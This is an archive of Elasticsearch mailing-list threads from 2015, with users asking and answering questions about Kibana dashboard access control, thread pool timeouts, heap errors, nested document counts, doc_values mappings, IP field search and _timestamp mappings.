Re: Access to specific kibana dashboards

2015-04-16 Thread Rubaiyat Islam Sadat
Thanks Mark for your kind reply. Would you be a bit more specific, as I am a 
newbie? I am sorry if I was not clear enough about what I want to achieve. 
As far as I know, Apache-level access control is based on static 
paths/URLs; it doesn't know the details of how Kibana works. I would like to restrict 
access to 'some' of the Kibana dashboards, not all. Is it possible to 
achieve this by configuring the Kibana side? If on the Apache side, do I have 
to restrict the specific URLs of the Kibana dashboards to the specific group of 
people, e.g. as follows?


<Location ...>
  Order deny,allow
  deny from all
  allow from 192.168.
  allow from 104.113.
</Location>

<Location ...>
  Order deny,allow
  deny from all
  allow from 192.168.
  allow from 104.113.
</Location>

In this case, for example, if I want to restrict a URL like 
http://myESHost:9200/_plugin/kopf/#/!/cluster, what do I have to put in the 
<Location> directive? Sorry if I have asked a very naive question.
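One possible setup, sketched under the assumption that Elasticsearch is reverse-proxied through Apache (mod_proxy enabled) and that KB3 stores its saved dashboards in the kibana-int index; the /es/ prefix and the dashboard name "MyDashboard" below are placeholders, not real paths. Note that anything after # in a URL, e.g. #/!/cluster above, is a browser-side fragment that is never sent to the server, so Apache cannot match on it; the ACL has to target the resource the browser actually fetches:

```apache
# Proxy Elasticsearch through Apache so its ACLs apply
# (Apache 2.2 syntax, matching the Order/Deny/Allow style above)
ProxyPass        /es/ http://myESHost:9200/
ProxyPassReverse /es/ http://myESHost:9200/

# Only these subnets may load the saved dashboard document "MyDashboard"
<Location "/es/kibana-int/dashboard/MyDashboard">
    Order deny,allow
    Deny from all
    Allow from 192.168.
    Allow from 104.113.
</Location>
```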

Thanks again for your time.

Cheers!
Ruby

On Friday, April 17, 2015 at 12:23:50 AM UTC+2, Mark Walkom wrote:
>
> You could do this with apache/nginx ACLs as KB3 simply loads a path, 
> either a file from the server's FS or from ES.
>
> If you load it up you will see it in the URL.
>
> On 16 April 2015 at 21:58, Rubaiyat Islam Sadat wrote:
>
>> Hi all,
>>
>> As a complete newbie here, I am going to ask you a question which you 
>> might find naive (or stupid!). I have a scenario where I would like to 
>> restrict access from specific locations (say, IP addresses) to access 
>> *'specific'* dashboards in Kibana. As far as I know, Apache-level 
>> access control is based on static paths/URLs; it won't know the details of how 
>> Kibana works. Is there any way/suggestion to control which users can load 
>> which dashboards? Or maybe I'm wrong and there is a way to do that. Your 
>> suggestions would be really helpful. I am using Kibana 3 and I am not in a 
>> position to use Shield.
>>
>> Cheers!
>> Ruby
>>
>> -- 
>> You received this message because you are subscribed to the Google Groups 
>> "elasticsearch" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to elasticsearc...@googlegroups.com .
>> To view this discussion on the web visit 
>> https://groups.google.com/d/msgid/elasticsearch/cc652358-4d42-4263-9238-a76f42de5dad%40googlegroups.com
>>  
>> 
>> .
>> For more options, visit https://groups.google.com/d/optout.
>>
>
>



Re: Saturating the management thread pool

2015-04-16 Thread Mark Walkom
Also related https://github.com/elastic/elasticsearch/issues/10447

On 17 April 2015 at 12:37, Charlie Moad  wrote:

> This was tracked down to a problem with Ubuntu 14.04 running under Xen (in
> AWS). The latest kernel in Ubuntu resolves the problem, so I had to do a
> rolling "apt-get update; apt-get dist-upgrade; reboot" on all nodes. This
> appears to have resolved the issue.
>
> For reference:
> https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1317811
>
>
> On Thursday, April 16, 2015 at 11:20:06 AM UTC-4, Charlie Moad wrote:
>>
>> A few days ago we started to receive a lot of timeouts across our
>> cluster. This is causing shard allocation to fail and a perpetual
>> red/yellow state.
>>
>> Examples:
>> [2015-04-16 15:04:50,970][DEBUG][action.admin.cluster.node.stats]
>> [coordinator02] failed to execute on node [1rfWT-mXTZmF_NzR_h1IZw]
>> org.elasticsearch.transport.ReceiveTimeoutTransportException:
>> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][cluster:monitor/nodes/stats[n]]
>> request_id [3680727] timed out after [15001ms]
>> at
>> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>>
>> [2015-04-16 15:03:26,105][WARN ][gateway.local]
>> [coordinator02] [global.y2014m01d30.v2][0]: failed to list shard stores on
>> node [1rfWT-mXTZmF_NzR_h1IZw]
>> org.elasticsearch.action.FailedNodeException: Failed node
>> [1rfWT-mXTZmF_NzR_h1IZw]
>> at
>> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.onFailure(TransportNodesOperationAction.java:206)
>> at
>> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.access$1000(TransportNodesOperationAction.java:97)
>>
>> at
>> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction$4.handleException(TransportNodesOperationAction.java:178)
>> at
>> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
>> at
>> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>> at
>> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>> at java.lang.Thread.run(Thread.java:745)
>> Caused by: org.elasticsearch.transport.ReceiveTimeoutTransportException:
>> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][internal:cluster/nodes/indices/shard/store[n]]
>> request_id [3677537] timed out after [30001ms]
>> ... 4 more
>>
>> I believe I have tracked this down to the management thread pool being 
>> saturated on our data nodes and not responding to requests. Our cluster has 
>> 3 master nodes (no data) and 3 worker nodes (no master). I increased the 
>> maximum pool size from 5 to 20 and the workers immediately jumped to 20. 
>> I'm still seeing the errors.
>>
>> host            type     active  size  queue  rejected  largest  completed  min  max  keepAlive
>> coordinator01   scaling  1       2     0      0         2        37884      1    20   5m
>> search02        scaling  1       20    0      0         20       1945337    1    20   5m
>> search01        scaling  1       20    0      0         20       2034838    1    20   5m
>> search03        scaling  1       20    0      0         20       1862848    1    20   5m
>> coordinator03   scaling  1       2     0      0         2        37875      1    20   5m
>> coordinator02   scaling  2       5     0      0         5        44127      1    20   5m
>>
>> How can I address this problem?
>>
>> Thanks,
>>  Charlie
>>

Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread Manjula Piyumal
Hi Jörg,

Thanks a lot for your help. May I know the size of one record that
you are publishing to ES? And did you make any changes to the
default configuration?

Thanks
Manjula

On Fri, Apr 17, 2015 at 2:51 AM, joergpra...@gmail.com <
joergpra...@gmail.com> wrote:

> I have thousands of concurrent indexing/queries running per second on
> non-virtualized servers.
>
> 4G heap is OK, it is more than enough; I am sure there are other reasons for
> the OOM.
>
> Maybe Bigdesk can help for monitoring heap and cache eviction rates.
>
> I think I cannot help any further; I have no experience with EC2.
>
> Jörg
>
> On Thu, Apr 16, 2015 at 8:05 PM, Manjula Piyumal wrote:
>
>> Hi Jörg,
>>
>> Sorry, my bad. It's a typo; I have used a 4GB heap for all three ES
>> servers. I tried without limiting the cache size as the first attempt,
>> but it also hit the out of memory error. Am I missing any other
>> configuration? Or is this load too much for a 4GB heap?
>>
>> Thanks
>> Manjula
>>
>>
>
>



-- 
*Manjula Piyumal De Silva*

Software Engineer,
AdroitLogic Private Ltd,



Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
Thanks Glen!

On Friday, April 17, 2015 at 11:14:36 AM UTC+8, Glen Smith wrote:
>
> Go to the "browser" tab and select the type. That will show the count you 
> are looking for.
>
>
>
> On Thursday, April 16, 2015 at 10:44:29 PM UTC-4, Xudong You wrote:
>>
>> Just figured out that the doc count is actually the number of documents plus 
>> the number of items in the nested field; in my case, the QueryClicks field has 
>> two items, so the total number of docs shown on head is 1+2=3.
>> But this might confuse people who view doc counts on head or other UI 
>> plug-ins.
>>
>> Is there any way to let head just show the doc count, regardless of whether 
>> the doc has nested fields or not?
>>
>>
>> On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>>>
>>> I was confused by the docs count value displayed in the head plugin when 
>>> there is a nested type field defined in the mapping.
>>>
>>> For example, I created a new index with following mapping:
>>> {
>>>   "mappings" : {
>>>     "doc" : {
>>>       "properties" : {
>>>         "QueryClicks" : {
>>>           "type" : "nested",
>>>           "properties" : {
>>>             "Count" : { "type" : "long" },
>>>             "Term" : { "type" : "string" }
>>>           }
>>>         },
>>>         "Title" : { "type" : "string" }
>>>       }
>>>     }
>>>   }
>>> }
>>>
>>> And then insert ONE doc:
>>> {
>>>   
>>> "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>>>   "Title":"test title"
>>> }
>>>
>>> Then refresh Head, the docs shown on Head is 3:
>>> size: 3.57ki (6.97ki)
>>> docs: 3 (3)
>>>
>>> Why?
>>>
>>



Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Glen Smith
Go to the "browser" tab and select the type. That will show the count you 
are looking for.



On Thursday, April 16, 2015 at 10:44:29 PM UTC-4, Xudong You wrote:
>
> Just figured out that the doc count is actually the number of documents plus 
> the number of items in the nested field; in my case, the QueryClicks field has 
> two items, so the total number of docs shown on head is 1+2=3.
> But this might confuse people who view doc counts on head or other UI 
> plug-ins.
>
> Is there any way to let head just show the doc count, regardless of whether 
> the doc has nested fields or not?
>
>
> On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>>
>> I was confused by the docs count value displayed in the head plugin when 
>> there is a nested type field defined in the mapping.
>>
>> For example, I created a new index with following mapping:
>> {
>>   "mappings" : {
>>     "doc" : {
>>       "properties" : {
>>         "QueryClicks" : {
>>           "type" : "nested",
>>           "properties" : {
>>             "Count" : { "type" : "long" },
>>             "Term" : { "type" : "string" }
>>           }
>>         },
>>         "Title" : { "type" : "string" }
>>       }
>>     }
>>   }
>> }
>>
>> And then insert ONE doc:
>> {
>>   "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>>   "Title":"test title"
>> }
>>
>> Then refresh Head, the docs shown on Head is 3:
>> size: 3.57ki (6.97ki)
>> docs: 3 (3)
>>
>> Why?
>>
>



Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
Just figured out that the doc count is actually the number of documents plus 
the number of items in the nested field; in my case, the QueryClicks field has 
two items, so the total number of docs shown on head is 1+2=3.
But this might confuse people who view doc counts on head or other UI 
plug-ins.

Is there any way to let head just show the doc count, regardless of whether 
the doc has nested fields or not?


On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>
> I was confused by the docs count value displayed in the head plugin when 
> there is a nested type field defined in the mapping.
>
> For example, I created a new index with following mapping:
> {
>   "mappings" : {
>     "doc" : {
>       "properties" : {
>         "QueryClicks" : {
>           "type" : "nested",
>           "properties" : {
>             "Count" : { "type" : "long" },
>             "Term" : { "type" : "string" }
>           }
>         },
>         "Title" : { "type" : "string" }
>       }
>     }
>   }
> }
>
> And then insert ONE doc:
> {
>   "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>   "Title":"test title"
> }
>
> Then refresh Head, the docs shown on Head is 3:
> size: 3.57ki (6.97ki)
> docs: 3 (3)
>
> Why?
>



Re: Saturating the management thread pool

2015-04-16 Thread Charlie Moad
This was tracked down to a problem with Ubuntu 14.04 running under Xen (in 
AWS). The latest kernel in Ubuntu resolves the problem, so I had to do a 
rolling "apt-get update; apt-get dist-upgrade; reboot" on all nodes. This 
appears to have resolved the issue.

For reference: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1317811
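For anyone retracing the debugging described above, the management pool can be watched and resized along these lines (a sketch for ES 1.x; the host and the size of 20 are just the values discussed in this thread):

```sh
# Watch the management pool across nodes (cat API, ES 1.x column names)
curl 'localhost:9200/_cat/thread_pool?v&h=host,management.type,management.active,management.size,management.queue,management.rejected,management.completed'

# Raise the pool's maximum size cluster-wide without a restart
curl -XPUT 'localhost:9200/_cluster/settings' -d '
{
  "transient" : { "threadpool.management.size" : 20 }
}'
```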

On Thursday, April 16, 2015 at 11:20:06 AM UTC-4, Charlie Moad wrote:
>
> A few days ago we started to receive a lot of timeouts across our cluster. 
> This is causing shard allocation to fail and a perpetual red/yellow state.
>
> Examples:
> [2015-04-16 15:04:50,970][DEBUG][action.admin.cluster.node.stats] 
> [coordinator02] failed to execute on node [1rfWT-mXTZmF_NzR_h1IZw]
> org.elasticsearch.transport.ReceiveTimeoutTransportException: 
> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][cluster:monitor/nodes/stats[n]]
>  
> request_id [3680727] timed out after [15001ms]
> at 
> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
> at 
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> at 
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> at java.lang.Thread.run(Thread.java:745)
>
> [2015-04-16 15:03:26,105][WARN ][gateway.local] 
> [coordinator02] [global.y2014m01d30.v2][0]: failed to list shard stores on 
> node [1rfWT-mXTZmF_NzR_h1IZw]
> org.elasticsearch.action.FailedNodeException: Failed node 
> [1rfWT-mXTZmF_NzR_h1IZw]
> at 
> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.onFailure(TransportNodesOperationAction.java:206)
> at 
> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction.access$1000(TransportNodesOperationAction.java:97)
>
> at 
> org.elasticsearch.action.support.nodes.TransportNodesOperationAction$AsyncAction$4.handleException(TransportNodesOperationAction.java:178)
> at 
> org.elasticsearch.transport.TransportService$TimeoutHandler.run(TransportService.java:529)
> at 
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
> at 
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
> at java.lang.Thread.run(Thread.java:745)
> Caused by: org.elasticsearch.transport.ReceiveTimeoutTransportException: 
> [search01][inet[ip-172-30-11-161.ec2.internal/172.30.11.161:9300]][internal:cluster/nodes/indices/shard/store[n]]
>  
> request_id [3677537] timed out after [30001ms]
> ... 4 more
>
> I believe I have tracked this down to the management thread pool being 
> saturated on our data nodes and not responding to requests. Our cluster has 
> 3 master nodes (no data) and 3 worker nodes (no master). I increased the 
> maximum pool size from 5 to 20 and the workers immediately jumped to 20. 
> I'm still seeing the errors.
>
> host            type     active  size  queue  rejected  largest  completed  min  max  keepAlive
> coordinator01   scaling  1       2     0      0         2        37884      1    20   5m
> search02        scaling  1       20    0      0         20       1945337    1    20   5m
> search01        scaling  1       20    0      0         20       2034838    1    20   5m
> search03        scaling  1       20    0      0         20       1862848    1    20   5m
> coordinator03   scaling  1       2     0      0         2        37875      1    20   5m
> coordinator02   scaling  2       5     0      0         5        44127      1    20   5m
>
> How can I address this problem?
>
> Thanks,
>  Charlie
>


Re: Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
BTW: If I just remove the "type":"nested" from the mapping, the doc count 
is then correct after inserting one document.
Does anyone have suggestions to resolve this issue?
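For anyone else puzzled by this, the arithmetic can be sketched in a few lines (a toy illustration of the counting, not Elasticsearch code): each nested object is indexed as its own hidden Lucene document next to the parent, and head reports the raw Lucene count.

```python
# A parent document whose nested field holds two objects: Lucene stores
# 1 parent doc + 1 hidden doc per nested object, which is what head counts.
doc = {
    "Title": "test title",
    "QueryClicks": [
        {"Term": "term1", "Count": 10},
        {"Term": "term2", "Count": 10},
    ],
}

lucene_docs = 1 + len(doc["QueryClicks"])
print(lucene_docs)  # 3, matching head's "docs: 3 (3)"
```

The _count API (GET /<index>/_count) only counts top-level documents, so it is one way to see the number you expect.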

On Thursday, April 16, 2015 at 5:36:04 PM UTC+8, Xudong You wrote:
>
> I was confused by the docs count value displayed in the head plugin when 
> there is a nested type field defined in the mapping.
>
> For example, I created a new index with following mapping:
> {
>   "mappings" : {
>     "doc" : {
>       "properties" : {
>         "QueryClicks" : {
>           "type" : "nested",
>           "properties" : {
>             "Count" : { "type" : "long" },
>             "Term" : { "type" : "string" }
>           }
>         },
>         "Title" : { "type" : "string" }
>       }
>     }
>   }
> }
>
> And then insert ONE doc:
> {
>   "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
>   "Title":"test title"
> }
>
> Then refresh Head, the docs shown on Head is 3:
> size: 3.57ki (6.97ki)
> docs: 3 (3)
>
> Why?
>



Re: Could use some help with using Doc Values

2015-04-16 Thread Scott Chapman
Thanks. The field I wanted to map was @timestamp, which isn't explicitly in 
the template. What would it look like?

Also, once I have made the change to my template, what's the right way to 
test it (validate that a new index is using doc values for the 
specific field)?
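In case it helps, a sketch of what the entry might look like, assuming @timestamp is a date field in a Logstash-style template (doc_values applies to not_analyzed string, numeric, and date fields):

```json
"@timestamp" : {
    "type" : "date",
    "doc_values" : true
}
```

To validate: wait for a new index to be created from the template, then fetch its mapping (e.g. curl 'localhost:9200/<new-index>/_mapping?pretty', with the index name substituted) and check that the field shows "doc_values" : true.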

On Thursday, April 16, 2015 at 7:57:41 PM UTC-4, Mark Walkom wrote:
>
> As per the docs just add this;
>
> "@version" : {
> "index" : "not_analyzed",
> "type" : "string",
> *"doc_values": true*
>   }
>
> On 17 April 2015 at 09:35, Scott Chapman  > wrote:
>
>> Thanks, that's what I thought.
>>
>> So, please help me with my template I gave above. I am familiar with how 
>> to update it, I am just not really sure how to change it so that a 
>> specific field uses doc values. Or if it is easier to make it the default for 
>> all fields, I suppose that's fine too, since it sounds like that will happen 
>> eventually.
>>
>> Just need help with what the structure of the template should be... 
>> Thanks!
>>
>> On Wednesday, April 15, 2015 at 8:29:28 PM UTC-4, Mark Walkom wrote:
>>>
>>> Yes that is correct, you have to update your mappings and wait for new 
>>> indices to be created from it, it's not something that can be applied 
>>> retroactively without reindexing.
>>>
>>> On 16 April 2015 at 09:55, Scott Chapman  wrote:
>>>
 Yea, that's where I started with it. But, if I understand it, that 
 looks like how I can change the mapping for a specific property. But I 
 would think I need to make a similar change to my index template, otherwise 
 new indexes that get created will no longer have that mapping. Or am I 
 misunderstanding?

 On Wednesday, April 15, 2015 at 7:20:22 PM UTC-4, Mark Walkom wrote:
>
> Start here and you'll be good to go - http://www.elastic.co/guide/
> en/elasticsearch/guide/current/doc-values.html
>
> On 16 April 2015 at 08:03, Scott Chapman  wrote:
>
>> Probably. I just need some help figuring out how to do that. Help?
>>
>> On Wednesday, April 15, 2015 at 5:42:55 PM UTC-4, Mark Walkom wrote:
>>>
>>> You should, ideally, be using it for anything that isn't analysed.
>>>
>>
>

>>>
>>
>
>



Re: Could use some help with using Doc Values

2015-04-16 Thread Mark Walkom
As per the docs just add this:

"@version" : {
    "index" : "not_analyzed",
    "type" : "string",
    "doc_values" : true
}

On 17 April 2015 at 09:35, Scott Chapman  wrote:

> Thanks, that's what I thought.
>
> So, please help me with my template I gave above. I am familiar with how to
> update it, I am just not really sure how to change it so that a specific
> field uses doc values. Or if it is easier to make it the default for all
> fields, I suppose that's fine too, since it sounds like that will happen
> eventually.
>
> Just need help with what the structure of the template should be... Thanks!
>
> On Wednesday, April 15, 2015 at 8:29:28 PM UTC-4, Mark Walkom wrote:
>>
>> Yes that is correct, you have to update your mappings and wait for new
>> indices to be created from it, it's not something that can be applied
>> retroactively without reindexing.
>>
>> On 16 April 2015 at 09:55, Scott Chapman  wrote:
>>
>>> Yea, that's where I started with it. But, if I understand it, that looks
>>> like how I can change the mapping for a specific property. But I would
>>> think I need to make a similar change to my index template, otherwise new
>>> indexes that get created will no longer have that mapping. Or am I
>>> misunderstanding?
>>>
>>> On Wednesday, April 15, 2015 at 7:20:22 PM UTC-4, Mark Walkom wrote:

 Start here and you'll be good to go - http://www.elastic.co/guide/
 en/elasticsearch/guide/current/doc-values.html

 On 16 April 2015 at 08:03, Scott Chapman  wrote:

> Probably. I just need some help figuring out how to do that. Help?
>
> On Wednesday, April 15, 2015 at 5:42:55 PM UTC-4, Mark Walkom wrote:
>>
>> You should, ideally, be using it for anything that isn't analysed.
>>
>

>>>
>>
>



Re: Could use some help with using Doc Values

2015-04-16 Thread Scott Chapman
Thanks, that's what I thought.

So, please help me with my template I gave above. I am familiar with how to 
update it, I am just not really sure how to change it so that a specific 
field uses doc values. Or if it is easier to make it the default for all 
fields, I suppose that's fine too, since it sounds like that will happen 
eventually.

Just need help with what the structure of the template should be... Thanks!

On Wednesday, April 15, 2015 at 8:29:28 PM UTC-4, Mark Walkom wrote:
>
> Yes that is correct, you have to update your mappings and wait for new 
> indices to be created from it, it's not something that can be applied 
> retroactively without reindexing.
>
> On 16 April 2015 at 09:55, Scott Chapman  > wrote:
>
>> Yea, that's where I started with it. But, if I understand it, that looks 
>> like how I can change the mapping for a specific property. But I would 
>> think I need to make a similar change to my index template, otherwise new 
>> indexes that get created will no longer have that mapping. Or am I 
>> misunderstanding?
>>
>> On Wednesday, April 15, 2015 at 7:20:22 PM UTC-4, Mark Walkom wrote:
>>>
>>> Start here and you'll be good to go - http://www.elastic.co/guide/
>>> en/elasticsearch/guide/current/doc-values.html
>>>
>>> On 16 April 2015 at 08:03, Scott Chapman  wrote:
>>>
 Probably. I just need some help figuring out how to do that. Help?

 On Wednesday, April 15, 2015 at 5:42:55 PM UTC-4, Mark Walkom wrote:
>
> You should, ideally, be using it for anything that isn't analysed.
>

>>>
>>
>
>



Re: Access to specific kibana dashboards

2015-04-16 Thread Mark Walkom
You could do this with apache/nginx ACLs as KB3 simply loads a path, either
a file from the server's FS or from ES.

If you load it up you will see it in the URL.

On 16 April 2015 at 21:58, Rubaiyat Islam Sadat <
rubaiyatislam.sa...@gmail.com> wrote:

> Hi all,
>
> As a complete newbie here, I am going to ask you a question which you
> might find naive (or stupid!). I have a scenario where I would like to
> restrict access from specific locations (say, IP addresses) to access
> *'specific'* dashboards in Kibana. As far as I know, Apache-level
> access control is based on static paths/URLs; it won't know the details of how
> Kibana works. Is there any way/suggestion to control which users can load
> which dashboards? Or maybe I'm wrong and there is a way to do that. Your
> suggestions would be really helpful. I am using Kibana 3 and I am not in a
> position to use Shield.
>
> Cheers!
> Ruby
>



Re: How to configure max file descriptors on windows OS?

2015-04-16 Thread Mark Walkom
-1 means unbounded, i.e. unlimited.
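For anyone reading these numbers programmatically: treat -1 as a sentinel rather than a count. A small sketch (Python; the sample dict mimics the process section shown above, and the values are illustrative; on Windows the JVM simply does not report a descriptor limit, which is why both fields come back as -1):

```python
def describe_fd_limit(process_stats):
    """Turn the descriptor fields from a nodes-stats process section
    into a human-readable string; -1 means no limit is reported."""
    limit = process_stats.get("max_file_descriptors", -1)
    if limit == -1:
        return "unbounded (no OS-enforced limit reported)"
    open_fds = process_stats.get("open_file_descriptors", 0)
    return f"{open_fds} open of {limit} allowed"

# Windows-style output, where the JVM exposes no descriptor limit:
sample = {"max_file_descriptors": -1, "open_file_descriptors": -1}
print(describe_fd_limit(sample))  # unbounded (no OS-enforced limit reported)
```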

On 16 April 2015 at 20:54, Xudong You  wrote:

> Does anyone know how to change max_file_descriptors on Windows?
> I built an ES cluster on Windows and got the following process information:
>
> "max_file_descriptors" : -1,
> "open_file_descriptors" : -1,
>
> What does "-1" mean?
> Is it possible to change the max file descriptors on the Windows platform?
>



Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread joergpra...@gmail.com
I have thousands of concurrent indexing/queries running per second on
non-virtualized servers.

A 4GB heap is OK, it is more than enough; I am sure there are other reasons
for the OOM.

Maybe Bigdesk can help for monitoring heap and cache eviction rates.

I don't think I can help any further, as I have no experience with EC2.

Jörg

On Thu, Apr 16, 2015 at 8:05 PM, Manjula Piyumal 
wrote:

> Hi Jörg,
>
> Sorry, my bad. It's a typo, I have used a 4GB heap for all three ES servers.
> I tried without limiting the cache size as the first attempt, but it
> also got the out of memory error. Am I missing any other configuration?
> Or is this load too much for a 4GB heap?
>
> Thanks
> Manjula
>



Re: Storing/searching IPs

2015-04-16 Thread joergpra...@gmail.com
It is possible to write a plugin with IP/subnet as a new field type.

Jörg

On Thu, Apr 16, 2015 at 9:34 PM, Attila Nagy  wrote:

> Hi,
>
> I would like to store IP addresses and subnets (one or more per document)
> and I would like to search for them with exact match or inclusion (is an
> IP in any of the subnets stored in the documents).
>
> For example a document could have the following:
> "ip": ["192.168.0.1","192.168.1.0/24","1000::/64"]
>
> And searching for 192.168.0.1, 192.168.1.5 or 1000::1 should match it.
>
> Is there any chance of having this sometime soon? And if not, what would
> be the best hack (if any) to support this?
>
> Thanks,
>



Re: Scoring based on the number of matches in the field

2015-04-16 Thread Andre Dantas Rocha
Hi Doug,

Your suggestion worked perfectly!

Thanks very much.

Andre



Storing/searching IPs

2015-04-16 Thread Attila Nagy
Hi,

I would like to store IP addresses and subnets (one or more per document) 
and I would like to search for them with exact match or inclusion (is an 
IP in any of the subnets stored in the documents).

For example a document could have the following:
"ip": ["192.168.0.1","192.168.1.0/24","1000::/64"]

And searching for 192.168.0.1, 192.168.1.5 or 1000::1 should match it.

Is there any chance of having this sometime soon? And if not, what would be 
the best hack (if any) to support this?

Thanks,
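Short of writing a field-type plugin, one hack covers half of the problem (stored single IPs queried by subnet): the built-in `ip` field type indexes IPv4 addresses as longs, so a CIDR block can be rewritten as a numeric range filter. A sketch using Python's stdlib; the field name `ip` is illustrative, and IPv6 entries like `1000::/64` remain out of reach this way:

```python
import ipaddress

def subnet_to_range_filter(field, cidr):
    """Rewrite an IPv4 CIDR as an Elasticsearch range filter over the
    long representation that the `ip` field type indexes."""
    net = ipaddress.ip_network(cidr, strict=True)
    return {"range": {field: {"gte": int(net.network_address),
                              "lte": int(net.broadcast_address)}}}

# 192.168.1.0/24 covers the numeric span 3232235776..3232236031
print(subnet_to_range_filter("ip", "192.168.1.0/24"))
```

The other direction (stored subnets matched by a single IP) would need each document's subnets indexed as two numeric bounds, with a query checking `lower <= ip <= upper`.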



Re: how to change the store value of a field

2015-04-16 Thread Antoine Brun
merci!

On Thu, Apr 16, 2015 at 7:11 PM, David Pilato  wrote:

> No you need to reindex
>
> --
> David ;-)
> Twitter : @dadoonet / @elasticsearchfr / @scrutmydocs
>
> Le 16 avr. 2015 à 17:52, Antoine Brun  a écrit :
>
> Hello,
>
> is there any simple way to update a mapping and change the store value of
> a field?
> I'm trying to enable _timestamp:
> curl -X PUT http://localhost:9200/ubilogs-mbr/_mappings/logs -d '{
> "logs" : {
> "_timestamp" : {
> "enabled" : true,
> "store" : true,
> "format": "yyyy-MM-dd HH:mm:ss.SSS"
> }
> }
> }'
>
> but I get
>
> {"error":"MergeMappingException[Merge failed with failures {[mapper
> [_timestamp] has different store values]}]","status":400}
>
>
> Antoine
>
>



-- 
Antoine



Re: ES load test ended up with out of memory error after enabling the clustering

2015-04-16 Thread Manjula Piyumal
Hi Jörg,

Sorry, my bad. It's a typo, I have used a 4GB heap for all three ES servers. 
I tried without limiting the cache size as the first attempt, but it 
also got the out of memory error. Am I missing any other configuration? 
Or is this load too much for a 4GB heap?

Thanks
Manjula



Re: how to change the store value of a field

2015-04-16 Thread David Pilato
No, you need to reindex.
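A conflicting `_timestamp` mapping cannot be merged in place, so the usual route is: create a new index with the desired mapping, then copy documents across with the bulk API (scan/scroll on the old index). A sketch of the copy step in Python; the hit shapes and index name are illustrative:

```python
import json

def hits_to_bulk_body(hits, new_index):
    """Build an NDJSON bulk body that re-indexes scroll hits into
    new_index, preserving each document's type and id."""
    lines = []
    for hit in hits:
        lines.append(json.dumps({"index": {"_index": new_index,
                                           "_type": hit["_type"],
                                           "_id": hit["_id"]}}))
        lines.append(json.dumps(hit["_source"]))
    return "\n".join(lines) + "\n"

hits = [{"_type": "logs", "_id": "1", "_source": {"msg": "a"}},
        {"_type": "logs", "_id": "2", "_source": {"msg": "b"}}]
print(hits_to_bulk_body(hits, "ubilogs-mbr-v2"))
```

The resulting body is POSTed to `_bulk`; repeat per scroll page until the old index is drained, then switch an alias over.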

--
David ;-)
Twitter : @dadoonet / @elasticsearchfr / @scrutmydocs

> Le 16 avr. 2015 à 17:52, Antoine Brun  a écrit :
> 
> Hello,
> 
> is there any simple way to update a mapping and change the store value of a 
> field?
> I'm trying to enable _timestamp:
> curl -X PUT http://localhost:9200/ubilogs-mbr/_mappings/logs -d '{
> "logs" : {
> "_timestamp" : { 
> "enabled" : true,
> "store" : true,
> "format": "yyyy-MM-dd HH:mm:ss.SSS"
> }
> }
> }'
> 
> but I get
> 
> {"error":"MergeMappingException[Merge failed with failures {[mapper 
> [_timestamp] has different store values]}]","status":400}
> 
> 
> Antoine
> 
> 



Re: timestamp

2015-04-16 Thread David Pilato
You need to reindex in a new index.

--
David ;-)
Twitter : @dadoonet / @elasticsearchfr / @scrutmydocs

> Le 16 avr. 2015 à 17:33, Antoine Brun  a écrit :
> 
> Hello,
> 
> based on the comments I could create a new index with _timestamp activated 
> and it works great.
> Now my problem arises when I want to activate the timestamp on an existing 
> index.
> Since _timestamp is not stored by default, I wanted to set "store" to true, 
> but I get 
> 
> {
> "error": "MergeMappingException[Merge failed with failures {[mapper 
> [_timestamp] has different store values]}]",
> "status": 400
> }
> 
> Is there any way to achieve this?
> 
> Antoine
> 
> 
> Le mardi 7 avril 2015 18:20:33 UTC+2, Antoine Brun a écrit :
>> 
>> Hello,
>> 
>> I'm trying to use the timestamp feature to automatically add a timestamp to 
>> the newly indexed doc.
>> Since we are already indexing documents without timestamps, I figured out 
>> that I could simply execute:
>> 
>> curl -XPUT 'http://localhost:9200/ubilogs-mbr/_mapping/logs' -d '{
>> "logs" : {
>> "_timestamp" : { 
>>  "enabled" : true,
>>   "stored" : true,
